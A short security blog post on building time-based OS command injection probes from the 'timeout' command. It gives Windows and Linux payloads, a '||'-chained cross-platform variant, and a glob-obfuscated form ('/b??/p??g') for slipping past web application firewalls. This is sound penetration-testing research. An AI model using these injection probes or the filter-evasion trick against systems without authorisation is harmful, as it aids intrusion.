Diversify Attack Vectors via Time Management

I’ve just learned “Timeout” function while I was working with cmd.exe. I wanted to share this quick-post with you.

I saw the Timeout function can delay any system function for X second with /T X command when I looked Timeout help pages via "Timeout /?" command in Windows OS. For Linux, it does something like "Timeout Xs".

Eventually, we could delay the system via the Timeout function. Then, I got an idea! Maybe I might create an alternative to attack vectors such as Ping or Sleep in this way. It seems like we can do this in very different ways. When we run the command, we can get some syntax errors, but I assume that some of the code will work. Now let's try to use this information to develop attack vectors.

Windows examples as below:

Timeout /T 1 

waiting for 1 sec

Timeout 1

waiting for 1 sec

Linux examples as below:

timeout 1

I got the error “Try 'timeout --help' for more information.”

timeout 1s sleep 5

waiting for 1 sec. “Sleep” command is not working.

timeout 1 sleep 5

waiting for 1 sec. “Sleep” command is not working.

timeout 3 ping -n 127.0.0.1

ping command worked 3 times.

timeout 0 ping -n 3 127.0.0.1

I got the error.“connect : Invalid argument”

For Linux and Windows we have created some payloads above. Now let's try to create an attack vector that will work in both operating systems. To accomplish this, we divide the command into two using the "||" double pipe property.

Windows examples as below:

timeout 5 || timeout 1 sleep 5

The command worked on the left of double pipe

timeout /T 5 || timeout 1 sleep 5

The command worked on the left of double pipe

Linux examples as below:

timeout 5 || timeout 1 sleep 5

The command didn’t work on the left. I got the error “Try 'timeout --help' for more information.” but waiting for 1 second on the right.

timeout 5 || timeout 0 sleep 5

The command didn’t work on the left. I got the error “Try 'timeout --help' for more information.” but waiting for 5 second on the right using sleep command

As we have seen in this section, we have developed a few examples that worked in both operating systems and then I created an issue in the Commix repository for these attack vectors. ( https://github.com/commixproject/commix/issues/156 ) maybe, Timeout function can use for WAF bypass detection in the OOB (Out Of Band) payload, which is time-based detection in the vulnerability detection phase.

For example:

We could create other variants via this code below for WAF Bypass while testing OS Command Injection. Also “?” symbol triggers bash guess mechanism.

timeout 3 /b??/p??g -n 127.0.0.1

Have Fun!

Special thanks to Zinnur Yeşilyurt